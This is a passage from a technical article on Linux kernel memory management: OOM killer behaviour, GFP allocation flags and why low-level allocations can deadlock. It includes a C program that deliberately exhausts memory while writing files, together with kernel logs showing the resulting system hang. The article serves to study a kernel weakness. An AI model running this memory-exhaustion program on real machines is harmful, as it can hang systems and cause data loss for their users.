The OOM killer does not take memory associated with file descriptors into account, and takes only memory associated with mm_struct into account.

This assumes that majority of memory is associated with mm_struct. Therefore, if the system got an attack which consumes all memory as pipe's buffer using many file descriptors, the OOM killer resulted in killing most of innocent processes one by one.

The kmemcg which in memory cgroup functionality can track memory used inside the kernel. Normal memory cgroup (which is not kmemcg) tracks memory associated with mm_struct.

· There are GFP ( Get Free Page ) flags.

When requesting for free memory, the requester specifies a bitmask called GFP flags. This bitmask controls what actions are possible for making free memory (e.g. reclaiming memory used for caching purpose) and how hard the kernel should try to reclaim memory. This is a world where memory allocation requests in userspace (e.g. malloc()) does not recognize.

·This is nested subcontractor structure.

GFP_KERNEL
(__GFP_RECLAIM | __GFP_IO | __GFP_FS)

Used by mainly applications (contractors).

If needed, the kernel can perform fs writeback (reflecting changes for file systems) operations using __GFP_FS flag and/or storage I/O (read/write) operations using __GFP_IO flags.

GFP_NOFS
(__GFP_RECLAIM | __GFP_IO)

Used by mainly filesystems (subcontractors).

If needed, the kernel can perform storage I/O operations using __GFP_IO flags. But in order to avoid deadlocks, the kernel cannot perform fs writeback operations.

GFP_NOIO
(__GFP_RECLAIM)

Used by mainly device drivers (sub-sub contractors).

In order to avoid deadlocks, the kernel cannot perform fs writeback operations nor storage I/O operations.

· Impossible to win games which deadlock if wrong GFP flags are specified.

For example, if __GFP_FS flag (which allows the kernel to perform fs writeback operations) is by error specified at memory allocation requests which occur with locks for filesystem held, there is a possibility of deadlock.

Also, no messages are printed when deadlock actually occurred. It just looks that the system got unexplained hung up.

· In addition to that, error handling is poor.

Since nobody actively tests the behavior of out of memory. the error handling paths for memory allocation failure are hardly tested. Therefore, we can observe various strange behaviors if we intentionally make memory allocation requests to fail.


3.3 About conditions for invoking OOM killer

· The kernel basically does not invoke the OOM killer for allocation requests which is larger than or equals to order-4 (in other words, allocation requests which is larger than 32768 bytes) in order not to kill processes unnecessarily.

If such memory allocation request is absolutely necessary, the kernel will invoke the OOM killer by specifying __GFP_NOFAIL flag. But since there is risk of terminating majority of processes due to fragmentation of memory, vmalloc() which can allow large memory allocation requests at the cost of some performance penalty is commonly used for large memory allocation requests instead of specifying __GFP_NOFAIL.

· The kernel basically does not invoke the OOM killer for GFP_NOFS allocation requests (subcontractors' requests) or GFPP_NOIO allocation requests (sub-sub contractors' requests).

There might be memory which can be reclaimed if fs writeback operation is performed (i.e. GFP_KERNEL). Therefore, in order to avoid killing processes prematurely, the kernel does not invoke the OOM killer unless __GFP_FS flag or __GFP_NOFAIL flag is specified.

· The OOM killer is basically kept disabled until the killed process releases its mm_struct.

Killing a process means that working state is lost. Since the OOM killer reclaims memory by killing processes, it is expected that the OOM killer does not kill processes more than needed. Therefore, the kernel uses TIF_MEMDIE flag for indicating that "this process was terminated by the OOM killer".

The kernel shows two exceptional behavior by setting TIF_MEMDIE flag to processes.

Step 1: Before OOM situation occurs
Before OOM situation occurs
Step 2: Immediately after OOM situation occurred
Immediately after OOM situation occurred
Step 3: The OOM killer kills a process
The OOM killer kills a process
Step 4: Survive OOM situation by allocating from "memory reserves"
Survive by allocating from memory reserves
Step 5: Process releases mm_struct
Process releases mm_struct
Step 6: After OOM situation is resolved
After OOM situation is resolved

3.4 About situations presenting ultimately tough choices

When an application performs asynchronous write requests to a file, the content to be written is cached onto memory allocated by GFP_KERNEL allocation requests. Then, periodically or as needed basis, the content is reflected to filesystems using memory allocated by GFP_NOFS allocation requests. And, when reflecting changes to filesystems, storage I/O operation is performed using memory allocated by GFP_NOIO allocation requests.

This means that, in order to satisfy GFP_KERNEL allocation requests (contractors' requests), GFP_NOFS allocation requests (subcontractors' requests) need to be satisfied. And, in order to satisfy GFP_NOFS allocation requests (subcontractors' requests), GFP_NOIO allocation requests (sub-sub contractors' requests) need to be satisfied.

But all allocation requests use same watermark (the value of min: level). In other words, when GFP_KERNEL allocation requests cannot be satisfied, GFP_NOFS and GFP_NOIO allocation requests cannot be satisfied as well.

That is, if the kernel does not want to invoke the OOM killer for allocation requests from GFP_NOFS (subcontractors) and GFP_NOIO (sub-sub contractors), the kernel has no choice other than denying such allocation requests (i.e. fail such allocation requests), doesn't it?

But failing storage I/O due to failing sub-sub contractor's memory allocation results in a damage to subcontractors (filesystem inconsistency). For example, if ext4 filesystem encounters such failure, the filesystem will be remounted read-only or trigger a kernel panic.

Likewise, failing filesystem read/write due to failing subcontractor's memory allocation results in a damage to contractors (application). For example, the content written by asynchronous write requests will be lost.

Therefore, we don't want the kernel to willingly deny subcontractors' / sub-sub contractors' allocation requests because of not invoking the OOM killer ···.


Chapter 4   An affair which exposed contradiction in memory management subsystem


4.1 What happens if actually presented ultimately tough choices?

It seems that we can reproduce by concurrently running a process which consumes all memory using malloc() + memset() and a process which consumes a little memory by doing asynchronous file writes.

Experiment: What will happen if OOM situation occurred while writing to a file?

---------- memset+write.c ----------
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

int main(int argc, char *argv[])
{
        unsigned long size;
        char *buf = NULL;
        unsigned long i;
        for (i = 0; i < 10; i++) {
                if (fork() == 0) {
                        static char buf[4096];
                        const int fd = open("/tmp/file", O_CREAT | O_WRONLY |
                                            O_APPEND, 0600);
                        while (write(fd, buf, sizeof(buf)) == sizeof(buf));
                        pause();
                        _exit(0);
                }
        }
        for (size = 1048576; size < 512UL * (1 << 30); size <<= 1) {
                char *cp = realloc(buf, size);
                if (!cp) {
                        size >>= 1;
                        break;
                }
                buf = cp;
        }
        sleep(5);
        /* Will cause OOM due to overcommit */
        for (i = 0; i < size; i += 4096)
                buf[i] = 0;
        pause();
        return 0;
}
---------- memset+write.c ----------

Result: The system hung up.

---------- Example output start ----------
[   67.776733] memset+write invoked oom-killer: gfp_mask=0x280da, order=0, oom_score_adj=0
[   67.778409] memset+write cpuset=/ mems_allowed=0
[   67.779310] CPU: 1 PID: 4158 Comm: memset+write Not tainted 3.10.0-327.18.2.el7.x86_64 #1
[   67.780988] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013
[   67.783002]  ffff88007bbadc00 0000000015e9c4b5 ffff88007b127af8 ffffffff81635a0c
[   67.784679]  ffff88007b127b88 ffffffff816309ac ffff880079cd5750 ffff880079cd5768
[   67.786253]  0000000000000206 ffff88007bbadc00 ffff88007b127b70 ffffffff81128b1f
[   67.788065] Call Trace:
[   67.788645]  [<ffffffff81635a0c>] dump_stack+0x19/0x1b
[   67.789606]  [<ffffffff816309ac>] dump_header+0x8e/0x214
[   67.790620]  [<ffffffff81128b1f>] ? delayacct_end+0x8f/0xb0
[   67.791957]  [<ffffffff8116d0be>] oom_kill_process+0x24e/0x3b0
[   67.793085]  [<ffffffff8116cc26>] ? find_lock_task_mm+0x56/0xc0
[   67.794515]  [<ffffffff81088dae>] ? has_capability_noaudit+0x1e/0x30
[   67.795730]  [<ffffffff8116d8e6>] out_of_memory+0x4b6/0x4f0
[   67.796792]  [<ffffffff81173ac5>] __alloc_pages_nodemask+0xa95/0xb90
[   67.798004]  [<ffffffff811b7b8a>] alloc_pages_vma+0x9a/0x140
[   67.799125]  [<ffffffff81197925>] handle_mm_fault+0xb85/0xf50
[   67.800228]  [<ffffffff8163aae8>] ? __schedule+0x2d8/0x900
[   67.801479]  [<ffffffff816416c0>] __do_page_fault+0x150/0x450
[   67.802749]  [<ffffffff816419e3>] do_page_fault+0x23/0x80
[   67.803803]  [<ffffffff8163dc48>] page_fault+0x28/0x30
[   67.804805] Mem-Info:
[   67.805259] Node 0 DMA per-cpu:
[   67.806084] CPU    0: hi:    0, btch:   1 usd:   0
[   67.807042] CPU    1: hi:    0, btch:   1 usd:   0
[   67.807971] CPU    2: hi:    0, btch:   1 usd:   0
[   67.809149] CPU    3: hi:    0, btch:   1 usd:   0
[   67.810041] Node 0 DMA32 per-cpu:
[   67.810743] CPU    0: hi:  186, btch:  31 usd:  32
[   67.811942] CPU    1: hi:  186, btch:  31 usd:   0
[   67.812860] CPU    2: hi:  186, btch:  31 usd: 211
[   67.813691] CPU    3: hi:  186, btch:  31 usd:  50
[   67.814633] active_anon:385124 inactive_anon:2096 isolated_anon:0
[   67.814633]  active_file:6184 inactive_file:9766 isolated_file:0
[   67.814633]  unevictable:0 dirty:552 writeback:9326 unstable:0
[   67.814633]  free:15848 slab_reclaimable:4962 slab_unreclaimable:5615
[   67.814633]  mapped:5933 shmem:2161 pagetables:2108 bounce:0
[   67.814633]  free_cma:0
[   67.822567] Node 0 DMA free:7432kB min:400kB low:500kB high:600kB active_anon:7240kB inactive_anon:0kB active_file:200kB inactive_file:148kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:204kB mapped:184kB shmem:0kB slab_reclaimable:112kB slab_unreclaimable:160kB kernel_stack:64kB pagetables:292kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:27 all_unreclaimable? no
[   67.831956] lowmem_reserve[]: 0 1720 1720 1720
[   67.833707] Node 0 DMA32 free:53824kB min:44652kB low:55812kB high:66976kB active_anon:1533256kB inactive_anon:8384kB active_file:24536kB inactive_file:40900kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1763444kB mlocked:0kB dirty:1840kB writeback:39308kB mapped:23548kB shmem:8644kB slab_reclaimable:19736kB slab_unreclaimable:22300kB kernel_stack:6528kB pagetables:8140kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:448 all_unreclaimable? no
[   67.844988] lowmem_reserve[]: 0 0 0 0
[   67.846636] Node 0 DMA: 22*4kB (UEM) 13*8kB (UEM) 11*16kB (UEM) 4*32kB (UEM) 2*64kB (EM) 1*128kB (E) 2*256kB (UM) 2*512kB (UE) 1*1024kB (E) 2*2048kB (ER) 0*4096kB = 7408kB
[   67.851731] Node 0 DMA32: 941*4kB (UE) 693*8kB (UEM) 270*16kB (UEM) 216*32kB (UE) 117*64kB (UEM) 52*128kB (UEM) 27*256kB (UEM) 8*512kB (EM) 3*1024kB (M) 1*2048kB (M) 0*4096kB = 50812kB
[   67.857304] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=1048576kB
[   67.859927] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[   67.862160] 19726 total pagecache pages
[   67.863651] 0 pages in swap cache
[   67.865041] Swap cache stats: add 0, delete 0, find 0/0
[   67.866736] Free swap  = 0kB
[   67.868016] Total swap = 0kB
[   67.869295] 524157 pages RAM
[   67.870684] 0 pages HighMem/MovableOnly
[   67.872163] 79320 pages reserved
[   67.873467] [ pid ]   uid  tgid total_vm      rss nr_ptes swapents oom_score_adj name
[   67.875840] [  588]     0   588     9204      680      19        0             0 systemd-journal
[   67.878421] [  604]     0   604    10814      485      21        0         -1000 systemd-udevd
[   67.878422] [  912]     0   912    12803      451      25        0         -1000 auditd
[   67.878424] [ 1967]    70  1967     6997      389      18        0             0 avahi-daemon
[   67.878425] [ 1979]     0  1979    72391     1429      42        0             0 rsyslogd
[   67.878426] [ 1982]     0  1982    80896     5753      78        0             0 firewalld
[   67.878427] [ 1983]     0  1983     4829      316      14        0             0 irqbalance
[   67.878428] [ 1984]     0  1984     6612      435      15        0             0 systemd-logind
[   67.878429] [ 1985]    81  1985     6672      465      18        0          -900 dbus-daemon
[   67.878430] [ 1990]    70  1990     6997       58      17        0             0 avahi-daemon
[   67.878431] [ 2015]     0  2015    52593     1356      56        0             0 abrtd
[   67.878433] [ 2017]     0  2017    51993     1133      54        0             0 abrt-watch-log
[   67.878434] [ 2018]     0  2018     1094      148       8        0             0 rngd
[   67.878435] [ 2044]     0  2044    31583      393      21        0             0 crond
[   67.878436] [ 2181]     0  2181    46752     1141      41        0             0 vmtoolsd
[   67.878438] [ 2803]     0  2803    27631     3192      51        0             0 dhclient
[   67.878439] [ 2807]   999  2807   132051     3450      54        0             0 polkitd
[   67.878440] [ 2890]     0  2890    20640      900      40        0         -1000 sshd
[   67.878441] [ 2893]     0  2893   138262     4089      91        0             0 tuned
[   67.878442] [ 4096]     0  4096    22785      519      42        0             0 master
[   67.878443] [ 4102]     0  4102    64751     2099      57        0          -900 abrt-dbus
[   67.878445] [ 4108]     0  4108    23201      674      51        0             0 login
[   67.878445] [ 4109]     0  4109    27509      214      12        0             0 agetty
[   67.878446] [ 4113]     0  4113    79455      691     104        0             0 nmbd
[   67.878447] [ 4115]    89  4115    22811      976      44        0             0 pickup
[   67.878448] [ 4116]    89  4116    22828      984      45        0             0 qmgr
[   67.878450] [ 4130]     0  4130    96508     1392     138        0             0 smbd
[   67.878451] [ 4134]     0  4134    96508      735     132        0             0 smbd
[   67.878452] [ 4137]  1000  4137    28884      534      14        0             0 bash
[   67.878454] [ 4158]  1000  4158   541715   366511     725        0             0 memset+write
[   67.878455] [ 4159]  1000  4159     1042       21       6        0             0 memset+write
[   67.878456] [ 4160]  1000  4160     1042       21       6        0             0 memset+write
[   67.878457] [ 4161]  1000  4161     1042       21       6        0             0 memset+write
[   67.878458] [ 4162]  1000  4162     1042       21       6        0             0 memset+write
[   67.878459] [ 4163]  1000  4163     1042       21       6        0             0 memset+write
[   67.878460] [ 4164]  1000  4164     1042       21       6        0             0 memset+write
[   67.878461] [ 4165]  1000  4165     1042       21       6        0             0 memset+write
[   67.878461] [ 4166]  1000  4166     1042       21       6        0             0 memset+write
[   67.878462] [ 4167]  1000  4167     1042       21       6        0             0 memset+write
[   67.878463] [ 4168]  1000  4168     1042       21       6        0             0 memset+write
[   67.878464] Out of memory: Kill process 4158 (memset+write) score 825 or sacrifice child
[   67.878467] Killed process 4159 (memset+write) total-vm:4168kB, anon-rss:84kB, file-rss:0kB
[   68.333885] memset+write invoked oom-killer: gfp_mask=0x280da, order=0, oom_score_adj=0
[   68.335891] memset+write cpuset=/ mems_allowed=0
[   68.337124] CPU: 0 PID: 4158 Comm: memset+write Not tainted 3.10.0-327.18.2.el7.x86_64 #1
[   68.339035] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013
[   68.341410]  ffff88007bbadc00 0000000015e9c4b5 ffff88007b127af8 ffffffff81635a0c
[   68.343326]  ffff88007b127b88 ffffffff816309ac ffff880079cd5750 ffff880079cd5768
[   68.345256]  0000000000000206 ffff88007bbadc00 ffff88007b127b70 ffffffff81128b1f
[   68.347163] Call Trace:
[   68.348064]  [<ffffffff81635a0c>] dump_stack+0x19/0x1b
[   68.349439]  [<ffffffff816309ac>] dump_header+0x8e/0x214
[   68.350859]  [<ffffffff81128b1f>] ? delayacct_end+0x8f/0xb0
[   68.352320]  [<ffffffff8116d0be>] oom_kill_process+0x24e/0x3b0
[   68.353847]  [<ffffffff8116cc26>] ? find_lock_task_mm+0x56/0xc0
[   68.355373]  [<ffffffff81088dae>] ? has_capability_noaudit+0x1e/0x30
[   68.357016]  [<ffffffff8116d8e6>] out_of_memory+0x4b6/0x4f0
[   68.358503]  [<ffffffff81173ac5>] __alloc_pages_nodemask+0xa95/0xb90
[   68.360124]  [<ffffffff811b7b8a>] alloc_pages_vma+0x9a/0x140
[   68.361635]  [<ffffffff81197925>] handle_mm_fault+0xb85/0xf50
[   68.363147]  [<ffffffff8163aae8>] ? __schedule+0x2d8/0x900
[   68.364612]  [<ffffffff816416c0>] __do_page_fault+0x150/0x450
[   68.366144]  [<ffffffff816419e3>] do_page_fault+0x23/0x80
[   68.367616]  [<ffffffff8163dc48>] page_fault+0x28/0x30
[   68.369019] Mem-Info:
[   68.369890] Node 0 DMA per-cpu:
[   68.370979] CPU    0: hi:    0, btch:   1 usd:   0
[   68.372543] CPU    1: hi:    0, btch:   1 usd:   0
[   68.373900] CPU    2: hi:    0, btch:   1 usd:   0
[   68.375258] CPU    3: hi:    0, btch:   1 usd:   0
[   68.376576] Node 0 DMA32 per-cpu:
[   68.377683] CPU    0: hi:  186, btch:  31 usd:   0
[   68.379041] CPU    1: hi:  186, btch:  31 usd:   0
[   68.380402] CPU    2: hi:  186, btch:  31 usd:   0
[   68.381744] CPU    3: hi:  186, btch:  31 usd:  33
[   68.383107] active_anon:404397 inactive_anon:2096 isolated_anon:0
[   68.383107]  active_file:82 inactive_file:0 isolated_file:0
[   68.383107]  unevictable:0 dirty:2 writeback:64 unstable:0
[   68.383107]  free:12956 slab_reclaimable:4712 slab_unreclaimable:5666
[   68.383107]  mapped:489 shmem:2161 pagetables:2146 bounce:0
[   68.383107]  free_cma:0
[   68.391582] Node 0 DMA free:7272kB min:400kB low:500kB high:600kB active_anon:7948kB inactive_anon:0kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:40kB mapped:16kB shmem:0kB slab_reclaimable:52kB slab_unreclaimable:164kB kernel_stack:64kB pagetables:292kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes
[   68.400580] lowmem_reserve[]: 0 1720 1720 1720
[   68.402208] Node 0 DMA32 free:44552kB min:44652kB low:55812kB high:66976kB active_anon:1609640kB inactive_anon:8384kB active_file:328kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1763444kB mlocked:0kB dirty:8kB writeback:216kB mapped:1940kB shmem:8644kB slab_reclaimable:18796kB slab_unreclaimable:22500kB kernel_stack:6528kB pagetables:8292kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:2005 all_unreclaimable? yes
[   68.412886] lowmem_reserve[]: 0 0 0 0
[   68.414465] Node 0 DMA: 2*4kB (UE) 11*8kB (UE) 4*16kB (UE) 4*32kB (UEM) 3*64kB (EM) 3*128kB (EM) 1*256kB (U) 2*512kB (UE) 1*1024kB (E) 2*2048kB (ER) 0*4096kB = 7264kB
[   68.419424] Node 0 DMA32: 910*4kB (UEM) 568*8kB (UEM) 153*16kB (UEM) 151*32kB (UE) 94*64kB (UEM) 58*128kB (UEM) 32*256kB (UE) 9*512kB (E) 1*1024kB (M) 1*2048kB (M) 0*4096kB = 44776kB
[   68.424683] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=1048576kB
[   68.427106] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[   68.429457] 2258 total pagecache pages
[   68.430956] 0 pages in swap cache
[   68.432384] Swap cache stats: add 0, delete 0, find 0/0
[   68.434187] Free swap  = 0kB
[   68.435545] Total swap = 0kB
[   68.436865] 524157 pages RAM
[   68.438225] 0 pages HighMem/MovableOnly
[   68.439698] 79320 pages reserved
[   68.441072] [ pid ]   uid  tgid total_vm      rss nr_ptes swapents oom_score_adj name
[   68.443320] [  588]     0   588     9204      395      19        0             0 systemd-journal
[   68.445710] [  604]     0   604    10814      176      21        0         -1000 systemd-udevd
[   68.448100] [  912]     0   912    12803      122      25        0         -1000 auditd
[   68.450370] [ 1967]    70  1967     6997       63      18        0             0 avahi-daemon
[   68.452736] [ 1979]     0  1979    72391      926      42        0             0 rsyslogd
[   68.455063] [ 1982]     0  1982    80896     4270      78        0             0 firewalld
[   68.457297] [ 1983]     0  1983     4829       87      14        0             0 irqbalance
[   68.459638] [ 1984]     0  1984     6612       86      15        0             0 systemd-logind
[   68.462043] [ 1985]    81  1985     6672      128      18        0          -900 dbus-daemon
[   68.464379] [ 1990]    70  1990     6997       58      17        0             0 avahi-daemon
[   68.466708] [ 2015]     0  2015    52593      433      56        0             0 abrtd
[   68.468963] [ 2017]     0  2017    51993      352      54        0             0 abrt-watch-log
[   68.471530] [ 2018]     0  2018     1094       24       8        0             0 rngd
[   68.473807] [ 2044]     0  2044    31583      155      21        0             0 crond
[   68.476153] [ 2181]     0  2181    46752      262      41        0             0 vmtoolsd
[   68.478435] [ 2803]     0  2803    27631     3114      51        0             0 dhclient
[   68.480782] [ 2807]   999  2807   132051     2260      54        0             0 polkitd
[   68.483093] [ 2890]     0  2890    20640      222      40        0         -1000 sshd
[   68.485357] [ 2893]     0  2893   138262     2668      91        0             0 tuned
[   68.487615] [ 4096]     0  4096    22785      252      42        0             0 master
[   68.489912] [ 4102]     0  4102    64751     1000      57        0          -900 abrt-dbus
[   68.492253] [ 4108]     0  4108    23201      170      51        0             0 login
[   68.494525] [ 4109]     0  4109    27509       37      12        0             0 agetty
[   68.496785] [ 4113]     0  4113    79455      358     104        0             0 nmbd
[   68.499056] [ 4115]    89  4115    22811      253      44        0             0 pickup
[   68.501186] [ 4116]    89  4116    22828      250      45        0             0 qmgr
[   68.503333] [ 4130]     0  4130    96508      528     138        0             0 smbd
[   68.505438] [ 4134]     0  4134    96508      528     132        0             0 smbd
[   68.507535] [ 4137]  1000  4137    28884      134      14        0             0 bash
[   68.509598] [ 4158]  1000  4158   541715   385692     763        0             0 memset+write
[   68.511764] [ 4160]  1000  4160     1042       21       6        0             0 memset+write
[   68.513959] [ 4161]  1000  4161     1042       21       6        0             0 memset+write
[   68.515999] [ 4162]  1000  4162     1042       21       6        0             0 memset+write
[   68.518104] [ 4163]  1000  4163     1042       21       6        0             0 memset+write
[   68.520170] [ 4164]  1000  4164     1042       21       6        0             0 memset+write
[   68.522145] [ 4165]  1000  4165     1042       21       6        0             0 memset+write
[   68.524082] [ 4166]  1000  4166     1042       21       6        0             0 memset+write
[   68.526037] [ 4167]  1000  4167     1042       21       6        0             0 memset+write
[   68.527964] [ 4168]  1000  4168     1042       21       6        0             0 memset+write
[   68.529921] Out of memory: Kill process 4158 (memset+write) score 868 or sacrifice child
[   68.531913] Killed process 4160 (memset+write) total-vm:4168kB, anon-rss:84kB, file-rss:0kB
(Since no response, I pressed SysRq-m in order to show memory state.)
[  104.136563] SysRq : Show Memory
[  104.137695] Mem-Info:
[  104.138539] Node 0 DMA per-cpu:
[  104.139591] CPU    0: hi:    0, btch:   1 usd:   0
[  104.141033] CPU    1: hi:    0, btch:   1 usd:   0
[  104.142328] CPU    2: hi:    0, btch:   1 usd:   0
[  104.143600] CPU    3: hi:    0, btch:   1 usd:   0
[  104.144856] Node 0 DMA32 per-cpu:
[  104.145869] CPU    0: hi:  186, btch:  31 usd:  30
[  104.147112] CPU    1: hi:  186, btch:  31 usd:  32
[  104.148358] CPU    2: hi:  186, btch:  31 usd:   1
[  104.149592] CPU    3: hi:  186, btch:  31 usd:  30
[  104.150827] active_anon:404558 inactive_anon:2096 isolated_anon:0
[  104.150827]  active_file:0 inactive_file:0 isolated_file:0
[  104.150827]  unevictable:0 dirty:0 writeback:0 unstable:0
[  104.150827]  free:12924 slab_reclaimable:4632 slab_unreclaimable:5619
[  104.150827]  mapped:404 shmem:2161 pagetables:2162 bounce:0
[  104.150827]  free_cma:0
[  104.158594] Node 0 DMA free:7264kB min:400kB low:500kB high:600kB active_anon:7968kB inactive_anon:0kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:0kB slab_reclaimable:12kB slab_unreclaimable:160kB kernel_stack:64kB pagetables:292kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes
[  104.168335] lowmem_reserve[]: 0 1720 1720 1720
[  104.169812] Node 0 DMA32 free:44432kB min:44652kB low:55812kB high:66976kB active_anon:1610264kB inactive_anon:8384kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1763444kB mlocked:0kB dirty:0kB writeback:0kB mapped:1616kB shmem:8644kB slab_reclaimable:18516kB slab_unreclaimable:22316kB kernel_stack:6528kB pagetables:8356kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:2411 all_unreclaimable? yes
[  104.179790] lowmem_reserve[]: 0 0 0 0
[  104.181210] Node 0 DMA: 2*4kB (UE) 11*8kB (UE) 4*16kB (UE) 4*32kB (UEM) 3*64kB (EM) 3*128kB (EM) 1*256kB (U) 2*512kB (UE) 1*1024kB (E) 2*2048kB (ER) 0*4096kB = 7264kB
[  104.185866] Node 0 DMA32: 868*4kB (UEM) 562*8kB (UE) 151*16kB (UE) 154*32kB (UEM) 93*64kB (UE) 57*128kB (UE) 32*256kB (UE) 9*512kB (E) 1*1024kB (M) 1*2048kB (M) 0*4096kB = 44432kB
[  104.190836] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=1048576kB
[  104.193159] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[  104.195439] 2162 total pagecache pages
[  104.196881] 0 pages in swap cache
[  104.198244] Swap cache stats: add 0, delete 0, find 0/0
[  104.199974] Free swap  = 0kB
[  104.201274] Total swap = 0kB
[  104.202577] 524157 pages RAM
[  104.203874] 0 pages HighMem/MovableOnly
[  104.205345] 79320 pages reserved
(I again pressed SysRq-m in order to show memory state. But the situation did not improve.)
[  146.547225] SysRq : Show Memory
[  146.548766] Mem-Info:
[  146.549982] Node 0 DMA per-cpu:
[  146.551486] CPU    0: hi:    0, btch:   1 usd:   0
[  146.553161] CPU    1: hi:    0, btch:   1 usd:   0
[  146.554827] CPU    2: hi:    0, btch:   1 usd:   0
[  146.556593] CPU    3: hi:    0, btch:   1 usd:   0
[  146.558288] Node 0 DMA32 per-cpu:
[  146.559676] CPU    0: hi:  186, btch:  31 usd:  30
[  146.561395] CPU    1: hi:  186, btch:  31 usd:  59
[  146.563010] CPU    2: hi:  186, btch:  31 usd:   1
[  146.564634] CPU    3: hi:  186, btch:  31 usd:  30
[  146.566325] active_anon:404558 inactive_anon:2096 isolated_anon:0
[  146.566325]  active_file:0 inactive_file:0 isolated_file:0
[  146.566325]  unevictable:0 dirty:0 writeback:0 unstable:0
[  146.566325]  free:12893 slab_reclaimable:4632 slab_unreclaimable:5619
[  146.566325]  mapped:404 shmem:2161 pagetables:2162 bounce:0
[  146.566325]  free_cma:0
[  146.576409] Node 0 DMA free:7264kB min:400kB low:500kB high:600kB active_anon:7968kB inactive_anon:0kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:0kB slab_reclaimable:12kB slab_unreclaimable:160kB kernel_stack:64kB pagetables:292kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes
[  146.585972] lowmem_reserve[]: 0 1720 1720 1720
[  146.587814] Node 0 DMA32 free:44308kB min:44652kB low:55812kB high:66976kB active_anon:1610264kB inactive_anon:8384kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1763444kB mlocked:0kB dirty:0kB writeback:0kB mapped:1616kB shmem:8644kB slab_reclaimable:18516kB slab_unreclaimable:22316kB kernel_stack:6528kB pagetables:8356kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:2411 all_unreclaimable? yes
[  146.599568] lowmem_reserve[]: 0 0 0 0
[  146.601198] Node 0 DMA: 2*4kB (UE) 11*8kB (UE) 4*16kB (UE) 4*32kB (UEM) 3*64kB (EM) 3*128kB (EM) 1*256kB (U) 2*512kB (UE) 1*1024kB (E) 2*2048kB (ER) 0*4096kB = 7264kB
[  146.606977] Node 0 DMA32: 837*4kB (UEM) 562*8kB (UE) 151*16kB (UE) 154*32kB (UEM) 93*64kB (UE) 57*128kB (UE) 32*256kB (UE) 9*512kB (E) 1*1024kB (M) 1*2048kB (M) 0*4096kB = 44308kB
[  146.612321] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=1048576kB
[  146.614753] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB
[  146.617125] 2162 total pagecache pages
[  146.618674] 0 pages in swap cache
[  146.620106] Swap cache stats: add 0, delete 0, find 0/0
[  146.621893] Free swap  = 0kB
[  146.623225] Total swap = 0kB
[  146.624538] 524157 pages RAM
[  146.625970] 0 pages HighMem/MovableOnly
[  146.627442] 79320 pages reserved
(I pressed SysRq-f in order to invoke the OOM killer. But it did not help.)
[  153.523099] SysRq : Manual OOM execution
[  153.524763] kworker/0:1 invoked oom-killer: gfp_mask=0xd0, order=0, oom_score_adj=0
[  153.526884] kworker/0:1 cpuset=/ mems_allowed=0
[  153.528593] CPU: 0 PID: 163 Comm: kworker/0:1 Not tainted 3.10.0-327.18.2.el7.x86_64 #1
[  153.530840] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013
[  153.533615] Workqueue: events moom_callback
[  153.535183]  ffff88007bf73980 00000000dc64ad72 ffff88007ba4fc70 ffffffff81635a0c
[  153.537555]  ffff88007ba4fd00 ffffffff816309ac ffffffff81daaa00 ffffffff81a30200
[  153.539950]  00000000ffff8200 ffff88007ba4fca8 ffffffff8108bec3 ffff88007ba4fcc8
[  153.542293] Call Trace:
[  153.543642]  [<ffffffff81635a0c>] dump_stack+0x19/0x1b
[  153.545381]  [<ffffffff816309ac>] dump_header+0x8e/0x214
[  153.547324]  [<ffffffff8108bec3>] ? __internal_add_timer+0x113/0x130
[  153.549338]  [<ffffffff8108bf12>] ? internal_add_timer+0x32/0x70
[  153.551278]  [<ffffffff8116d0be>] oom_kill_process+0x24e/0x3b0
[  153.553271]  [<ffffffff8116cc26>] ? find_lock_task_mm+0x56/0xc0
[  153.555223]  [<ffffffff81088dae>] ? has_capability_noaudit+0x1e/0x30
[  153.557296]  [<ffffffff8116d8e6>] out_of_memory+0x4b6/0x4f0
